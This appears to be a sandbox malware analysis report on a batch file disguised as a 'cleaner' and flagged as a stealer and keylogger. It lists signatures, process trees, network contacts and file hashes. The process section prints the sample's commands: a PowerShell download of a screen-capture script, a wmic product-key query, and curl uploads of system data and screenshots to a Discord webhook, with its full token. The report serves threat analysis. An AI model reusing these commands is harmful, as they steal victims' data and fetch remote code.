Malware Analysis Report

2024-09-22 10:48

Sample ID: 240714-qjdl3a1hrr
Target: SchooiCleaner_1.0___.bat
SHA256: 4361ee39760d6451345a135dbb6845f2f17ddab9b1eb6c141c6cd37745b160c4
Tags: hawkeye, execution, keylogger, spyware, stealer, trojan
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: 4361ee39760d6451345a135dbb6845f2f17ddab9b1eb6c141c6cd37745b160c4

Threat Level: Known bad

The file SchooiCleaner_1.0___.bat was found to be: Known bad.

Malicious Activity Summary

Tags: hawkeye, execution, keylogger, spyware, stealer, trojan

HawkEye

Blocklisted process makes network request

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Gathers system information

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Gathers network information

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported: 2024-07-14 13:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-07-14 13:17
Reported: 2024-07-14 13:19
Platform: win11-20240709-en
Max time kernel: 136s
Max time network: 124s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_1.0___.bat"

Signatures

HawkEye

Tags: keylogger, trojan, stealer, spyware, hawkeye

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\screenCapture.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | discord.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A
N/A | discord.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | api.ipify.org | N/A | N/A

Command and Scripting Interpreter: PowerShell

Tactic: execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Delays execution with timeout.exe

Tactic: evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\timeout.exe | N/A
N/A | N/A | C:\Windows\system32\timeout.exe | N/A
N/A | N/A | C:\Windows\system32\timeout.exe | N/A
N/A | N/A | C:\Windows\system32\timeout.exe | N/A

Gathers network information

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A

Gathers system information

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\PING.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2540 wrote to memory of 2260 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\mode.com
PID 2540 wrote to memory of 2260 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\mode.com
PID 2540 wrote to memory of 2364 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\chcp.com
PID 2540 wrote to memory of 2364 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\chcp.com
PID 2540 wrote to memory of 2320 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\chcp.com
PID 2540 wrote to memory of 2320 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\chcp.com
PID 2540 wrote to memory of 692 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 692 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 4756 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2540 wrote to memory of 4756 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 1628 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\PING.EXE
PID 4756 wrote to memory of 1628 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\PING.EXE
PID 4756 wrote to memory of 6012 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4756 wrote to memory of 6012 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 2540 wrote to memory of 2988 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2540 wrote to memory of 2988 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2988 wrote to memory of 1068 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2988 wrote to memory of 1068 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 892 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 892 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 1928 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\ipconfig.exe
PID 2540 wrote to memory of 1928 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\ipconfig.exe
PID 2540 wrote to memory of 4156 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\systeminfo.exe
PID 2540 wrote to memory of 4156 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\systeminfo.exe
PID 2540 wrote to memory of 2384 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 2540 wrote to memory of 2384 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 2540 wrote to memory of 5632 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 5632 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 5616 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 5616 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 1536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2540 wrote to memory of 1536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2540 wrote to memory of 1536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1536 wrote to memory of 5940 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1536 wrote to memory of 5940 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1536 wrote to memory of 5940 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2540 wrote to memory of 5800 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
PID 2540 wrote to memory of 5800 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
PID 2540 wrote to memory of 3696 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3696 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 596 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 596 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4572 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4572 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3888 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3888 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 5148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 5148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 8 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 8 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 2284 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 2284 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4612 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4612 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3524 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3524 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3076 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3076 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4432 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4432 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4036 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4036 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 5924 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 5924 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_1.0___.bat"

C:\Windows\system32\mode.com

mode con cols=80 lines=30

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 437

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ping -4 -n 1 EHECWUZY | findstr [

C:\Windows\system32\PING.EXE

ping -4 -n 1 EHECWUZY

C:\Windows\system32\findstr.exe

findstr [

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Invoke-RestMethod api.ipify.org

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\system32\ipconfig.exe

ipconfig

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

wmic path softwarelicensingservice get OA3xOriginalProductKey

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "irm -useb https://raw.githubusercontent.com/npocmaka/batch.scripts/master/hybrids/.net/c/screenCapture.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /out:"screenCapture.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1.BAT"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79CF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCA8B082AB58D4426B75C42DD92DCEA25.TMP"

C:\Users\Admin\AppData\Local\Temp\screenCapture.exe

screenCapture.exe screenshot.png

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"~=CONNECTION ESTABLISHED=~ \nDate: Sun 07/14/2024 \nTime: 13:17:36.46 \nUsername: Admin \nComputer Name: EHECWUZY \nPublic IP: 194.110.13.70 \nPrivate IP: 10.127.0.146 \nInfo and Screenshot:\"}" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe (11 further single-attachment invocations with the command line shown above, to the same webhook URL)

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "file1=@Microsoft Edge.lnk" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe (13 further single-attachment invocations to the same webhook URL)

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 104.26.12.205:80 | api.ipify.org | tcp
US | 185.199.111.133:443 | raw.githubusercontent.com | tcp
US | 162.159.138.232:443 | discord.com | tcp
N/A | 127.0.0.1:49846 | N/A | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp

Files

memory/1068-0-0x00007FF883D23000-0x00007FF883D25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5wo5z4y.ip3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1068-10-0x000001FD7F510000-0x000001FD7F532000-memory.dmp

memory/1068-9-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp

memory/1068-11-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp

memory/1068-12-0x000001FD7FB60000-0x000001FD7FD22000-memory.dmp

memory/1068-15-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 c314cc5917d5a78a4e88f66d7114878c
SHA1 f4b714a9e5ac21fd60022a65818557e5ed192cf5
SHA256 eb8e99e59a78efe2b90663fdfca03f6664fed69cfa7a807e88047ffc6d674c31
SHA512 c02db5c81d2a55ef6b960b7b60b8bc7ad57ae250c1fe8709c40cab7acdcbfcf1fc0675682ea01ffe85cbd4146f67e1c90132d75e014d30403683e856615a4058

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ad60aefe903d80a798b904be4a3f0283
SHA1 5a27227a9aec298c043d9fe4162cc64664c01a25
SHA256 17c944d3e6e2a0dd06c58ae9cefe305fa7da552c010c012625abcc9585eeb214
SHA512 5a9ed746dd825929a2fa1a00b983563538be92a6b85df3728177e3a026babf659c0afadbf544c27aeae9b492b62ac9319af50eeeae610b0aee5256966d96470a

C:\Users\Admin\AppData\Local\Temp\screenCapture.bat

MD5 7c39bedd33b129b84117cb4e188eb9b6
SHA1 43e660c225a60a8327c7ce73ab6abaddcd412122
SHA256 2490bf909afee37ddc6dca73d51950c648b815b8d5a1fd853ad9f69413f4a711
SHA512 de368b8161612f7998f98b15a36028068b08052fceb2468855005cdc5ae6e44bebc8e6d3f0b6d340cd6308597863c003a353fe95eedd6a0a5bb4320e36ba7490

\??\c:\Users\Admin\AppData\Local\Temp\CSCCA8B082AB58D4426B75C42DD92DCEA25.TMP

MD5 b4aaae3b532554d0c7bd317d4834ab16
SHA1 28c854e399a3993ffd0df37b4385e29b4fe12905
SHA256 d7b2270159728b32e1ed60b03900ab7c9cb3c27df8f2456eae6824ad12f00f62
SHA512 ac6d36c61b057a0196cda5e249c5184a983bbf490ff1b54a6f263417e10c071addcb8437c840592e31637905e1fee10912e5932f9982e2abedc68cbb4a5e96a8

C:\Users\Admin\AppData\Local\Temp\RES79CF.tmp

MD5 0f133e69c8530b8ae98ec4adb4e9b1d0
SHA1 065c0f3aec8b2d506d0f2baa03e6e6868118b0c5
SHA256 0868235947268f367cb807d65816e4f1596f855cc435b84f99938a4ebafb857d
SHA512 e4e7eddb107b92b4d3e7e748f3c26532cdfcbc5865ef19881afc496ec1d7e00755b2f7fa2a9d6c3d38a9a0a1ff2d6b5043219c4f78c57eef72a5140dcb410b8b

C:\Users\Admin\AppData\Local\Temp\screenCapture.exe

MD5 4a68364176d5b85c0c42bd1dabdd399d
SHA1 6b693434b279f571a4e816c175ae12239c226e32
SHA256 b1437c0601bd59676a95865b8919728f954e22a602c11be285919ab471343762
SHA512 9c7af471cdf60f7581e380ebafd37dfee2b0834289383b9de3e768707a447cd8bcb9f271e8a357143d9076ce85bab3fe40a2ccfb3c0f4e60f7660f32e6f57aac

memory/5800-63-0x0000000000D60000-0x0000000000D68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ipconfig.txt

MD5 dcdb73ae0926f69516bd5b5b9d2d1888
SHA1 fda0767da11c328981ccb9998af535a7929f0a1f
SHA256 aa743f1eaec4122e2b452997ebc80e7db7fa9583709bb64e3df9a7d15f1bea95
SHA512 d596a66800fb402a03d42a6b4bc13c9a402f929e761d39ab810ee836377e3c00658231ae730c5488af4f6a223f407d69ded6c484b61058c07cb1bc0625ca984b

C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

MD5 57ed60900c36f66a54186df4150c80eb
SHA1 e55ea3cb420ae7c6f59f5004e1ce7168efec4b9d
SHA256 a6540f80fc8a3910299935b562b547015fb5fdb8809e604a26018759cbbd5413
SHA512 85fd807a25a26430df9ca5512a94c78c576e6cdd35d6cc5ad981758d2afe9e0ff39109464f094cb6ef8158d0759fae3637fe75864b1c997797ce78423f7f27fc

C:\Users\Admin\AppData\Local\Temp\screenshot.png

MD5 f82c9e40b7cae4ff5450ee68768df515
SHA1 5c9a0d485be491e63cb11db7e55f675599f84ba6
SHA256 b451967373e438503dc1eab458bea08fc388c489ffb4c5d31e367f7d6e72f8aa
SHA512 dfd7602f17bf71a190fc058b14f160cb204c951285ba5e1d1da777c71b30d5df6a122366a615a7cde1186f9e2f065b6a95f0fc2ebdc88c30d16ea39f7695e79d

C:\Users\Admin\AppData\Local\Temp\dir.txt

MD5 851ffc982e513bf50a75b4f81edf582d
SHA1 3918d31b5136eb012c1c7edb975b0f91a9abbad6
SHA256 dfdf810615ce2e8f00b24f1ef983789022478969eea1369733692c4fc0180eb4
SHA512 fb3ef5582b7a70d85dc122d29dff2e98719f1fc42dbd913d5f3479df447034ba5b72ba74d9013e9c32da6ce50517888b3a6fe3f7ce9f02f73c96bfa2ad3d93b4

C:\Users\Admin\AppData\Local\Temp\liscense.txt

MD5 b77c85675375ed548a4c019ae9ad5eda
SHA1 f1f6559245707e38403b72c57f201784f1086f7d
SHA256 81a02546f3d9da106053d1800ba1a0c00815a8903661b5c1c086a5c88aedd1f9
SHA512 3d6cdefda811dcaaff88f54117f03bfff04a04ba03efdf45167a7c4712bab3334974b404421d5bd1e3ad7eb65b0c390ddf472f9d256bd0cd8786e87ab8571bef